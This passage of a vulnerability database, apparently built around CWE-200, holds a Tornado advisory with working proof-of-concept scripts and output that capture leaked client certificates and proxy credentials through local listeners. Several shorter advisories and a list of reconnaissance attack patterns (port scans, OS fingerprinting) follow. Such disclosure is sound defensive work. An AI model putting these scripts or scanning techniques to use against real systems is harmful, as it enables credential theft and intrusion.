s2_key)\n _pem(cert_pem, cli_cert)\n with open(key_pem, \"wb\") as fh:\n fh.write(cli_key.private_bytes(\n serialization.Encoding.PEM,\n serialization.PrivateFormat.TraditionalOpenSSL,\n serialization.NoEncryption(),\n ))\n\n s1 = TLSServer(s1_pem, ca_pem, require=True)\n s2 = TLSServer(s2_pem, ca_pem, require=False)\n try:\n clean = CurlAsyncHTTPClient(max_clients=1, force_instance=True)\n await clean.fetch(HTTPRequest(\n f\"https://127.0.0.1:{s2.port}/baseline\",\n ca_certs=ca_pem, request_timeout=5), raise_error=False)\n clean.close()\n\n client = CurlAsyncHTTPClient(max_clients=1, force_instance=True)\n await client.fetch(HTTPRequest(\n f\"https://127.0.0.1:{s1.port}/internal-mtls\",\n client_cert=cert_pem, client_key=key_pem,\n ca_certs=ca_pem, request_timeout=5), raise_error=False)\n await client.fetch(HTTPRequest(\n f\"https://127.0.0.1:{s2.port}/other-host\",\n ca_certs=ca_pem, request_timeout=5), raise_error=False)\n await asyncio.sleep(0.2)\n client.close()\n finally:\n s1.stop()\n s2.stop()\n\n baseline = _cn(s2.captures[0]) if s2.captures else None\n leaked = _cn(s2.captures[1]) if len(s2.captures) \u003e 1 else None\n\n print(f\"{\u0027scenario\u0027:\u003c48}{\u0027cert presented to server 2\u0027}\")\n print(f\"{\u0027-\u0027 * 48}{\u0027-\u0027 * 28}\")\n print(f\"{\u0027baseline: clean client, no client_cert\u0027:\u003c48}{baseline!r}\")\n print(f\"{\u0027exploit: reused handle (A had client_cert)\u0027:\u003c48}{leaked!r}\")\n print()\n print(f\"(sanity) server 1 (mTLS required) saw: {_cn(s1.captures[0]) if s1.captures else None!r}\")\n print()\n if baseline is None and leaked == \"trusted-client\":\n print(\"VERDICT: VULNERABLE \u2014 the client certificate from request A was \"\n \"presented to server 2 on request B, which specified none.\")\n return 0\n print(f\"VERDICT: not reproduced (baseline={baseline!r} leaked={leaked!r})\")\n return 2\n\n\nif __name__ == \"__main__\":\n sys.exit(asyncio.run(main()))\n```\n\nOutput (`pip show tornado` \u2192 6.5.6, installed in the venv):\n\n```\nscenario cert presented to server 2\n----------------------------------------------------------------------------\nbaseline: clean client, no client_cert None\nexploit: reused handle (A had client_cert) \u0027trusted-client\u0027\n\n(sanity) server 1 (mTLS required) saw: \u0027trusted-client\u0027\n\nVERDICT: VULNERABLE \u2014 the client certificate from request A was presented to\nserver 2 on request B, which specified none.\n```\n\n### Vector B \u2014 proxy credentials\n\nEach proxy is a separate listener capturing the raw request bytes.\n\n```\n./venv/bin/python poc_proxy_creds.py\n```\n\n```python\nimport asyncio\nimport base64\nimport socket\nimport sys\nimport threading\n\nfrom tornado.httpclient import HTTPRequest\nfrom tornado.curl_httpclient import CurlAsyncHTTPClient\n\n\nclass CapturingProxy:\n def __init__(self):\n self.captures = []\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.sock.bind((\"127.0.0.1\", 0))\n self.sock.listen(4)\n self.port = self.sock.getsockname()[1]\n threading.Thread(target=self._serve, daemon=True).start()\n\n def _serve(self):\n while True:\n try:\n conn, _ = self.sock.accept()\n except OSError:\n return\n try:\n data = b\"\"\n while b\"\\r\\n\\r\\n\" not in data and len(data) \u003c 8192:\n chunk = conn.recv(2048)\n if not chunk:\n break\n data += chunk\n self.captures.append(data)\n conn.sendall(b\"HTTP/1.1 502 Bad Gateway\\r\\nContent-Length: 0\\r\\n\"\n b\"Connection: close\\r\\n\\r\\n\")\n except Exception:\n pass\n finally:\n conn.close()\n\n def stop(self):\n try:\n self.sock.close()\n except Exception:\n pass\n\n\ndef proxy_authz(raw):\n head = raw.split(b\"\\r\\n\\r\\n\", 1)[0].decode(\"latin1\", \"replace\")\n for line in head.split(\"\\r\\n\"):\n if line.lower().startswith(\"proxy-authorization:\"):\n return line\n return None\n\n\nasync def main():\n proxy_a = CapturingProxy()\n proxy_b = CapturingProxy()\n try:\n client = CurlAsyncHTTPClient(max_clients=1, force_instance=True)\n await client.fetch(HTTPRequest(\n \"http://target.example/a\",\n proxy_host=\"127.0.0.1\", proxy_port=proxy_a.port,\n proxy_username=\"alice\", proxy_password=\"secretA\",\n request_timeout=5, connect_timeout=5), raise_error=False)\n await client.fetch(HTTPRequest(\n \"http://target.example/b\",\n proxy_host=\"127.0.0.1\", proxy_port=proxy_b.port,\n request_timeout=5, connect_timeout=5), raise_error=False)\n await asyncio.sleep(0.2)\n client.close()\n finally:\n proxy_a.stop()\n proxy_b.stop()\n\n a = proxy_authz(proxy_a.captures[0]) if proxy_a.captures else None\n b = proxy_authz(proxy_b.captures[0]) if proxy_b.captures else None\n expected = \"Basic \" + base64.b64encode(b\"alice:secretA\").decode()\n\n print(f\"{\u0027request\u0027:\u003c42}{\u0027Proxy-Authorization seen by that proxy\u0027}\")\n print(f\"{\u0027-\u0027 * 42}{\u0027-\u0027 * 40}\")\n print(f\"{\u0027A -\u003e proxy A (alice:secretA specified)\u0027:\u003c42}{a or \u0027(none)\u0027}\")\n print(f\"{\u0027B -\u003e proxy B (NO credentials specified)\u0027:\u003c42}{b or \u0027(none)\u0027}\")\n print()\n if b and expected in b:\n print(f\"VERDICT: VULNERABLE \u2014 proxy B received alice\u0027s credentials \"\n f\"({expected}) although request B specified no proxy_username.\")\n return 0\n print(f\"VERDICT: not reproduced (proxy B saw: {b!r})\")\n return 2\n\n\nif __name__ == \"__main__\":\n sys.exit(asyncio.run(main()))\n```\n\nOutput (`YWxpY2U6c2VjcmV0QQ==` decodes to `alice:secretA`):\n\n```\nrequest Proxy-Authorization seen by that proxy\n----------------------------------------------------------------------------------\nA -\u003e proxy A (alice:secretA specified) Proxy-Authorization: Basic YWxpY2U6c2VjcmV0QQ==\nB -\u003e proxy B (NO credentials specified) Proxy-Authorization: Basic YWxpY2U6c2VjcmV0QQ==\n\nVERDICT: VULNERABLE \u2014 proxy B received alice\u0027s credentials (Basic\nYWxpY2U6c2VjcmV0QQ==) although request B specified no proxy_username.\n```\n\n## Impact\n\n* **Type:** Exposure of credentials to an unintended party (CWE-200), via reuse\n of a resource whose sensitive state was not cleared (CWE-672).\n* **Actors:** An application that issues requests with differing per-request\n options on a shared `CurlAsyncHTTPClient` \u2014 for Vector A, mixing per-request\n `client_cert` requests with non-certificate requests; for Vector B,\n multiplexing requests across more than one proxy with per-proxy credentials.\n* **Effect:** For Vector A, the client completes the TLS client-authentication\n handshake \u2014 proving possession of the private key and disclosing the\n certificate subject and chain \u2014 to a host that was never meant to receive it.\n For Vector B, proxy basic-auth credentials are transmitted (base64) to a\n different proxy. If the unintended host/proxy is attacker-controlled or\n attacker-influenced (a user-supplied URL, webhook target, SSRF-reachable\n endpoint, or a proxy chosen from user-controlled configuration), the credential\n is disclosed to the attacker.\n* **Scope:** Only applications using the optional `CurlAsyncHTTPClient` backend\n with the patterns above are affected. The default `SimpleAsyncHTTPClient` is not\n affected (and does not support proxies).\n\nProposed CWE: CWE-200 / CWE-672. Proposed CVSS 3.1:\n`CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N` (5.9, medium); attack complexity is\nHigh because exploitation depends on the application using differing per-request\noptions on a shared client and on handle scheduling.\n\n## Mitigation\n\nA single fix closes all instances of this class: call `curl.reset()` at the start\nof `_curl_setup_request` and then re-apply the per-request options, so no state\nfrom a prior request can persist on the reused handle. (Note `curl.reset()` also\nclears `CAINFO`, which the current code intentionally leaves untouched \u2014 see the\ncomment at lines 401-409 \u2014 so that default would need to be re-established after\nthe reset.)\n\nAlternatively, add explicit clearing branches mirroring the existing\n`PROXYUSERPWD`/`USERPWD` handling:\n\n```python\n# client certificate\nif request.client_cert is not None:\n curl.setopt(pycurl.SSLCERT, request.client_cert)\nelse:\n curl.unsetopt(pycurl.SSLCERT)\nif request.client_key is not None:\n curl.setopt(pycurl.SSLKEY, request.client_key)\nelse:\n curl.unsetopt(pycurl.SSLKEY)\n\n# proxy credentials (inside the `if request.proxy_host and request.proxy_port:` branch)\nif request.proxy_username:\n ...\n curl.setopt(pycurl.PROXYUSERPWD, credentials)\nelse:\n curl.unsetopt(pycurl.PROXYUSERPWD)\n\n# network interface\nif request.network_interface:\n curl.setopt(pycurl.INTERFACE, request.network_interface)\nelse:\n curl.unsetopt(pycurl.INTERFACE)\n```\n\nUntil a fix is available, use a separate `CurlAsyncHTTPClient` instance per\ndistinct credential set (per client certificate / per proxy credential), or use\n`SimpleAsyncHTTPClient` where applicable.",
"id": "GHSA-pw6j-qg29-8w7f",
"modified": "2026-06-15T20:37:24Z",
"published": "2026-06-15T20:37:24Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-pw6j-qg29-8w7f"
},
{
"type": "PACKAGE",
"url": "https://github.com/tornadoweb/tornado"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Tornado: CurlAsyncHTTPClient leaks per-request credentials on handle reuse"
}
GHSA-PW7H-6FP2-PVMV
Vulnerability from github – Published: 2025-01-07 06:32 – Updated: 2025-01-07 06:32The Optimize Your Campaigns – Google Shopping – Google Ads – Google Adwords plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 3.1 due to the print_php_information.php being publicly accessible. This makes it possible for unauthenticated attackers to extract sensitive configuration data that can be leveraged in another attack.
{
"affected": [],
"aliases": [
"CVE-2024-12159"
],
"database_specific": {
"cwe_ids": [
"CWE-200"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-01-07T05:15:15Z",
"severity": "MODERATE"
},
"details": "The Optimize Your Campaigns \u2013 Google Shopping \u2013 Google Ads \u2013 Google Adwords plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 3.1 due to the print_php_information.php being publicly accessible. This makes it possible for unauthenticated attackers to extract sensitive configuration data that can be leveraged in another attack.",
"id": "GHSA-pw7h-6fp2-pvmv",
"modified": "2025-01-07T06:32:15Z",
"published": "2025-01-07T06:32:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-12159"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/muzaara-adwords-optimize-dashboard/trunk/lib/muzaara/lib/google-ads-php/scripts/print_php_information.php"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cfeca343-c796-45d5-a71d-8211d8b38b3e?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-PW89-GXGV-MJVM
Vulnerability from github – Published: 2023-01-26 21:30 – Updated: 2023-02-02 18:30Instructure Canvas LMS didn't properly deny access to locked/unpublished files when the unprivileged user access the DocViewer based file preview URL (canvadoc_session_url).
{
"affected": [],
"aliases": [
"CVE-2021-36539"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-01-26T21:15:00Z",
"severity": "MODERATE"
},
"details": "Instructure Canvas LMS didn\u0027t properly deny access to locked/unpublished files when the unprivileged user access the DocViewer based file preview URL (canvadoc_session_url).",
"id": "GHSA-pw89-gxgv-mjvm",
"modified": "2023-02-02T18:30:30Z",
"published": "2023-01-26T21:30:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-36539"
},
{
"type": "WEB",
"url": "https://github.com/instructure/canvas-lms/issues/1905"
},
{
"type": "WEB",
"url": "https://github.com/gaukas/instructure-canvas-file-oracle"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-PW8M-6VCM-HXJ7
Vulnerability from github – Published: 2022-05-14 01:18 – Updated: 2022-05-14 01:18Graphics in Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows improper disclosure of memory contents, aka "Graphics Uniscribe Information Disclosure Vulnerability". This CVE ID is unique from CVE-2017-0286, CVE-2017-0287, CVE-2017-0288, CVE-2017-0289, CVE-2017-8531, and CVE-2017-8533.
{
"affected": [],
"aliases": [
"CVE-2017-8532"
],
"database_specific": {
"cwe_ids": [
"CWE-200"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-06-15T01:29:00Z",
"severity": "MODERATE"
},
"details": "Graphics in Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows improper disclosure of memory contents, aka \"Graphics Uniscribe Information Disclosure Vulnerability\". This CVE ID is unique from CVE-2017-0286, CVE-2017-0287, CVE-2017-0288, CVE-2017-0289, CVE-2017-8531, and CVE-2017-8533.",
"id": "GHSA-pw8m-6vcm-hxj7",
"modified": "2022-05-14T01:18:46Z",
"published": "2022-05-14T01:18:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-8532"
},
{
"type": "WEB",
"url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8532"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/98820"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1038662"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-PW9R-4X84-7PXX
Vulnerability from github – Published: 2026-03-26 15:30 – Updated: 2026-03-26 15:30HCL Aftermarket DPC is affected by File Discovery which allows attacker could exploit this issue to read sensitive files present in the system and may use it to craft further attacks.
{
"affected": [],
"aliases": [
"CVE-2025-55265"
],
"database_specific": {
"cwe_ids": [
"CWE-200"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-26T13:16:25Z",
"severity": "MODERATE"
},
"details": "HCL Aftermarket DPC is affected by File Discovery which allows attacker could exploit this issue to read sensitive files present in the system and may use it to craft further attacks.",
"id": "GHSA-pw9r-4x84-7pxx",
"modified": "2026-03-26T15:30:38Z",
"published": "2026-03-26T15:30:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55265"
},
{
"type": "WEB",
"url": "https://support.hcl-software.com/csm?id=kb_article\u0026sysparm_article=KB0129793"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation MIT-46
Strategy: Separation of Privilege
- Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.
- Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.
CAPEC-116: Excavation
An adversary actively probes the target in a manner that is designed to solicit information that could be leveraged for malicious purposes.
CAPEC-13: Subverting Environment Variable Values
The adversary directly or indirectly modifies environment variables used by or controlling the target software. The adversary's goal is to cause the target software to deviate from its expected operation in a manner that benefits the adversary.
CAPEC-169: Footprinting
An adversary engages in probing and exploration activities to identify constituents and properties of the target.
CAPEC-22: Exploiting Trust in Client
An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by communicating directly with the server where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.
CAPEC-224: Fingerprinting
An adversary compares output from a target system to known indicators that uniquely identify specific details about the target. Most commonly, fingerprinting is done to determine operating system and application versions. Fingerprinting can be done passively as well as actively. Fingerprinting by itself is not usually detrimental to the target. However, the information gathered through fingerprinting often enables an adversary to discover existing weaknesses in the target.
CAPEC-285: ICMP Echo Request Ping
An adversary sends out an ICMP Type 8 Echo Request, commonly known as a 'Ping', in order to determine if a target system is responsive. If the request is not blocked by a firewall or ACL, the target host will respond with an ICMP Type 0 Echo Reply datagram. This type of exchange is usually referred to as a 'Ping' due to the Ping utility present in almost all operating systems. Ping, as commonly implemented, allows a user to test for alive hosts, measure round-trip time, and measure the percentage of packet loss.
CAPEC-287: TCP SYN Scan
An adversary uses a SYN scan to determine the status of ports on the remote target. SYN scanning is the most common type of port scanning that is used because of its many advantages and few drawbacks. As a result, novice attackers tend to overly rely on the SYN scan while performing system reconnaissance. As a scanning method, the primary advantages of SYN scanning are its universality and speed.
CAPEC-290: Enumerate Mail Exchange (MX) Records
An adversary enumerates the MX records for a given via a DNS query. This type of information gathering returns the names of mail servers on the network. Mail servers are often not exposed to the Internet but are located within the DMZ of a network protected by a firewall. A side effect of this configuration is that enumerating the MX records for an organization my reveal the IP address of the firewall or possibly other internal systems. Attackers often resort to MX record enumeration when a DNS Zone Transfer is not possible.
CAPEC-291: DNS Zone Transfers
An attacker exploits a DNS misconfiguration that permits a ZONE transfer. Some external DNS servers will return a list of IP address and valid hostnames. Under certain conditions, it may even be possible to obtain Zone data about the organization's internal network. When successful the attacker learns valuable information about the topology of the target organization, including information about particular servers, their role within the IT structure, and possibly information about the operating systems running upon the network. This is configuration dependent behavior so it may also be required to search out multiple DNS servers while attempting to find one with ZONE transfers allowed.
CAPEC-292: Host Discovery
An adversary sends a probe to an IP address to determine if the host is alive. Host discovery is one of the earliest phases of network reconnaissance. The adversary usually starts with a range of IP addresses belonging to a target network and uses various methods to determine if a host is present at that IP address. Host discovery is usually referred to as 'Ping' scanning using a sonar analogy. The goal is to send a packet through to the IP address and solicit a response from the host. As such, a 'ping' can be virtually any crafted packet whatsoever, provided the adversary can identify a functional host based on its response. An attack of this nature is usually carried out with a 'ping sweep,' where a particular kind of ping is sent to a range of IP addresses.
CAPEC-293: Traceroute Route Enumeration
An adversary uses a traceroute utility to map out the route which data flows through the network in route to a target destination. Tracerouting can allow the adversary to construct a working topology of systems and routers by listing the systems through which data passes through on their way to the targeted machine. This attack can return varied results depending upon the type of traceroute that is performed. Traceroute works by sending packets to a target while incrementing the Time-to-Live field in the packet header. As the packet traverses each hop along its way to the destination, its TTL expires generating an ICMP diagnostic message that identifies where the packet expired. Traditional techniques for tracerouting involved the use of ICMP and UDP, but as more firewalls began to filter ingress ICMP, methods of traceroute using TCP were developed.
CAPEC-294: ICMP Address Mask Request
An adversary sends an ICMP Type 17 Address Mask Request to gather information about a target's networking configuration. ICMP Address Mask Requests are defined by RFC-950, "Internet Standard Subnetting Procedure." An Address Mask Request is an ICMP type 17 message that triggers a remote system to respond with a list of its related subnets, as well as its default gateway and broadcast address via an ICMP type 18 Address Mask Reply datagram. Gathering this type of information helps the adversary plan router-based attacks as well as denial-of-service attacks against the broadcast address.
CAPEC-295: Timestamp Request
This pattern of attack leverages standard requests to learn the exact time associated with a target system. An adversary may be able to use the timestamp returned from the target to attack time-based security algorithms, such as random number generators, or time-based authentication mechanisms.
CAPEC-296: ICMP Information Request
An adversary sends an ICMP Information Request to a host to determine if it will respond to this deprecated mechanism. ICMP Information Requests are a deprecated message type. Information Requests were originally used for diskless machines to automatically obtain their network configuration, but this message type has been superseded by more robust protocol implementations like DHCP.
CAPEC-297: TCP ACK Ping
An adversary sends a TCP segment with the ACK flag set to a remote host for the purpose of determining if the host is alive. This is one of several TCP 'ping' types. The RFC 793 expected behavior for a service is to respond with a RST 'reset' packet to any unsolicited ACK segment that is not part of an existing connection. So by sending an ACK segment to a port, the adversary can identify that the host is alive by looking for a RST packet. Typically, a remote server will respond with a RST regardless of whether a port is open or closed. In this way, TCP ACK pings cannot discover the state of a remote port because the behavior is the same in either case. The firewall will look up the ACK packet in its state-table and discard the segment because it does not correspond to any active connection. A TCP ACK Ping can be used to discover if a host is alive via RST response packets sent from the host.
CAPEC-298: UDP Ping
An adversary sends a UDP datagram to the remote host to determine if the host is alive. If a UDP datagram is sent to an open UDP port there is very often no response, so a typical strategy for using a UDP ping is to send the datagram to a random high port on the target. The goal is to solicit an 'ICMP port unreachable' message from the target, indicating that the host is alive. UDP pings are useful because some firewalls are not configured to block UDP datagrams sent to strange or typically unused ports, like ports in the 65K range. Additionally, while some firewalls may filter incoming ICMP, weaknesses in firewall rule-sets may allow certain types of ICMP (host unreachable, port unreachable) which are useful for UDP ping attempts.
CAPEC-299: TCP SYN Ping
An adversary uses TCP SYN packets as a means towards host discovery. Typical RFC 793 behavior specifies that when a TCP port is open, a host must respond to an incoming SYN "synchronize" packet by completing stage two of the 'three-way handshake' - by sending an SYN/ACK in response. When a port is closed, RFC 793 behavior is to respond with a RST "reset" packet. This behavior can be used to 'ping' a target to see if it is alive by sending a TCP SYN packet to a port and then looking for a RST or an ACK packet in response.
CAPEC-300: Port Scanning
An adversary uses a combination of techniques to determine the state of the ports on a remote target. Any service or application available for TCP or UDP networking will have a port open for communications over the network.
CAPEC-301: TCP Connect Scan
An adversary uses full TCP connection attempts to determine if a port is open on the target system. The scanning process involves completing a 'three-way handshake' with a remote port, and reports the port as closed if the full handshake cannot be established. An advantage of TCP connect scanning is that it works against any TCP/IP stack.
CAPEC-302: TCP FIN Scan
An adversary uses a TCP FIN scan to determine if ports are closed on the target machine. This scan type is accomplished by sending TCP segments with the FIN bit set in the packet header. The RFC 793 expected behavior is that any TCP segment with an out-of-state Flag sent to an open port is discarded, whereas segments with out-of-state flags sent to closed ports should be handled with a RST in response. This behavior should allow the adversary to scan for closed ports by sending certain types of rule-breaking packets (out of sync or disallowed by the TCB) and detect closed ports via RST packets.
CAPEC-303: TCP Xmas Scan
An adversary uses a TCP XMAS scan to determine if ports are closed on the target machine. This scan type is accomplished by sending TCP segments with all possible flags set in the packet header, generating packets that are illegal based on RFC 793. The RFC 793 expected behavior is that any TCP segment with an out-of-state Flag sent to an open port is discarded, whereas segments with out-of-state flags sent to closed ports should be handled with a RST in response. This behavior should allow an attacker to scan for closed ports by sending certain types of rule-breaking packets (out of sync or disallowed by the TCB) and detect closed ports via RST packets.
CAPEC-304: TCP Null Scan
An adversary uses a TCP NULL scan to determine if ports are closed on the target machine. This scan type is accomplished by sending TCP segments with no flags in the packet header, generating packets that are illegal based on RFC 793. The RFC 793 expected behavior is that any TCP segment with an out-of-state Flag sent to an open port is discarded, whereas segments with out-of-state flags sent to closed ports should be handled with a RST in response. This behavior should allow an attacker to scan for closed ports by sending certain types of rule-breaking packets (out of sync or disallowed by the TCB) and detect closed ports via RST packets.
CAPEC-305: TCP ACK Scan
An adversary uses TCP ACK segments to gather information about firewall or ACL configuration. The purpose of this type of scan is to discover information about filter configurations rather than port state. This type of scanning is rarely useful alone, but when combined with SYN scanning, gives a more complete picture of the type of firewall rules that are present.
CAPEC-306: TCP Window Scan
An adversary engages in TCP Window scanning to analyze port status and operating system type. TCP Window scanning uses the ACK scanning method but examine the TCP Window Size field of response RST packets to make certain inferences. While TCP Window Scans are fast and relatively stealthy, they work against fewer TCP stack implementations than any other type of scan. Some operating systems return a positive TCP window size when a RST packet is sent from an open port, and a negative value when the RST originates from a closed port. TCP Window scanning is one of the most complex scan types, and its results are difficult to interpret. Window scanning alone rarely yields useful information, but when combined with other types of scanning is more useful. It is a generally more reliable means of making inference about operating system versions than port status.
CAPEC-307: TCP RPC Scan
An adversary scans for RPC services listing on a Unix/Linux host.
CAPEC-308: UDP Scan
An adversary engages in UDP scanning to gather information about UDP port status on the target system. UDP scanning methods involve sending a UDP datagram to the target port and looking for evidence that the port is closed. Open UDP ports usually do not respond to UDP datagrams as there is no stateful mechanism within the protocol that requires building or establishing a session. Responses to UDP datagrams are therefore application specific and cannot be relied upon as a method of detecting an open port. UDP scanning relies heavily upon ICMP diagnostic messages in order to determine the status of a remote port.
CAPEC-309: Network Topology Mapping
An adversary engages in scanning activities to map network nodes, hosts, devices, and routes. Adversaries usually perform this type of network reconnaissance during the early stages of attack against an external network. Many types of scanning utilities are typically employed, including ICMP tools, network mappers, port scanners, and route testing utilities such as traceroute.
CAPEC-310: Scanning for Vulnerable Software
An attacker engages in scanning activity to find vulnerable software versions or types, such as operating system versions or network services. Vulnerable or exploitable network configurations, such as improperly firewalled systems, or misconfigured systems in the DMZ or external network, provide windows of opportunity for an attacker. Common types of vulnerable software include unpatched operating systems or services (e.g FTP, Telnet, SMTP, SNMP) running on open ports that the attacker has identified. Attackers usually begin probing for vulnerable software once the external network has been port scanned and potential targets have been revealed.
CAPEC-312: Active OS Fingerprinting
An adversary engages in activity to detect the operating system or firmware version of a remote target by interrogating a device, server, or platform with a probe designed to solicit behavior that will reveal information about the operating systems or firmware in the environment. Operating System detection is possible because implementations of common protocols (Such as IP or TCP) differ in distinct ways. While the implementation differences are not sufficient to 'break' compatibility with the protocol the differences are detectable because the target will respond in unique ways to specific probing activity that breaks the semantic or logical rules of packet construction for a protocol. Different operating systems will have a unique response to the anomalous input, providing the basis to fingerprint the OS behavior. This type of OS fingerprinting can distinguish between operating system types and versions.
CAPEC-313: Passive OS Fingerprinting
An adversary engages in activity to detect the version or type of OS software in a an environment by passively monitoring communication between devices, nodes, or applications. Passive techniques for operating system detection send no actual probes to a target, but monitor network or client-server communication between nodes in order to identify operating systems based on observed behavior as compared to a database of known signatures or values. While passive OS fingerprinting is not usually as reliable as active methods, it is generally better able to evade detection.
CAPEC-317: IP ID Sequencing Probe
This OS fingerprinting probe analyzes the IP 'ID' field sequence number generation algorithm of a remote host. Operating systems generate IP 'ID' numbers differently, allowing an attacker to identify the operating system of the host by examining how is assigns ID numbers when generating response packets. RFC 791 does not specify how ID numbers are chosen or their ranges, so ID sequence generation differs from implementation to implementation. There are two kinds of IP 'ID' sequence number analysis - IP 'ID' Sequencing: analyzing the IP 'ID' sequence generation algorithm for one protocol used by a host and Shared IP 'ID' Sequencing: analyzing the packet ordering via IP 'ID' values spanning multiple protocols, such as between ICMP and TCP.
CAPEC-318: IP 'ID' Echoed Byte-Order Probe
This OS fingerprinting probe tests to determine if the remote host echoes back the IP 'ID' value from the probe packet. An attacker sends a UDP datagram with an arbitrary IP 'ID' value to a closed port on the remote host to observe the manner in which this bit is echoed back in the ICMP error message. The identification field (ID) is typically utilized for reassembling a fragmented packet. Some operating systems or router firmware reverse the bit order of the ID field when echoing the IP Header portion of the original datagram within an ICMP error message.
CAPEC-319: IP (DF) 'Don't Fragment Bit' Echoing Probe
This OS fingerprinting probe tests to determine if the remote host echoes back the IP 'DF' (Don't Fragment) bit in a response packet. An attacker sends a UDP datagram with the DF bit set to a closed port on the remote host to observe whether the 'DF' bit is set in the response packet. Some operating systems will echo the bit in the ICMP error message while others will zero out the bit in the response packet.
CAPEC-320: TCP Timestamp Probe
This OS fingerprinting probe examines the remote server's implementation of TCP timestamps. Not all operating systems implement timestamps within the TCP header, but when timestamps are used then this provides the attacker with a means to guess the operating system of the target. The attacker begins by probing any active TCP service in order to get response which contains a TCP timestamp. Different Operating systems update the timestamp value using different intervals. This type of analysis is most accurate when multiple timestamp responses are received and then analyzed. TCP timestamps can be found in the TCP Options field of the TCP header.
CAPEC-321: TCP Sequence Number Probe
This OS fingerprinting probe tests the target system's assignment of TCP sequence numbers. One common way to test TCP Sequence Number generation is to send a probe packet to an open port on the target and then compare the how the Sequence Number generated by the target relates to the Acknowledgement Number in the probe packet. Different operating systems assign Sequence Numbers differently, so a fingerprint of the operating system can be obtained by categorizing the relationship between the acknowledgement number and sequence number as follows: 1) the Sequence Number generated by the target is Zero, 2) the Sequence Number generated by the target is the same as the acknowledgement number in the probe, 3) the Sequence Number generated by the target is the acknowledgement number plus one, or 4) the Sequence Number is any other non-zero number.
CAPEC-322: TCP (ISN) Greatest Common Divisor Probe
This OS fingerprinting probe sends a number of TCP SYN packets to an open port of a remote machine. The Initial Sequence Number (ISN) in each of the SYN/ACK response packets is analyzed to determine the smallest number that the target host uses when incrementing sequence numbers. This information can be useful for identifying an operating system because particular operating systems and versions increment sequence numbers using different values. The result of the analysis is then compared against a database of OS behaviors to determine the OS type and/or version.
CAPEC-323: TCP (ISN) Counter Rate Probe
This OS detection probe measures the average rate of initial sequence number increments during a period of time. Sequence numbers are incremented using a time-based algorithm and are susceptible to a timing analysis that can determine the number of increments per unit time. The result of this analysis is then compared against a database of operating systems and versions to determine likely operation system matches.
CAPEC-324: TCP (ISN) Sequence Predictability Probe
This type of operating system probe attempts to determine an estimate for how predictable the sequence number generation algorithm is for a remote host. Statistical techniques, such as standard deviation, can be used to determine how predictable the sequence number generation is for a system. This result can then be compared to a database of operating system behaviors to determine a likely match for operating system and version.
CAPEC-325: TCP Congestion Control Flag (ECN) Probe
This OS fingerprinting probe checks to see if the remote host supports explicit congestion notification (ECN) messaging. ECN messaging was designed to allow routers to notify a remote host when signal congestion problems are occurring. Explicit Congestion Notification messaging is defined by RFC 3168. Different operating systems and versions may or may not implement ECN notifications, or may respond uniquely to particular ECN flag types.
CAPEC-326: TCP Initial Window Size Probe
This OS fingerprinting probe checks the initial TCP Window size. TCP stacks limit the range of sequence numbers allowable within a session to maintain the "connected" state within TCP protocol logic. The initial window size specifies a range of acceptable sequence numbers that will qualify as a response to an ACK packet within a session. Various operating systems use different Initial window sizes. The initial window size can be sampled by establishing an ordinary TCP connection.
CAPEC-327: TCP Options Probe
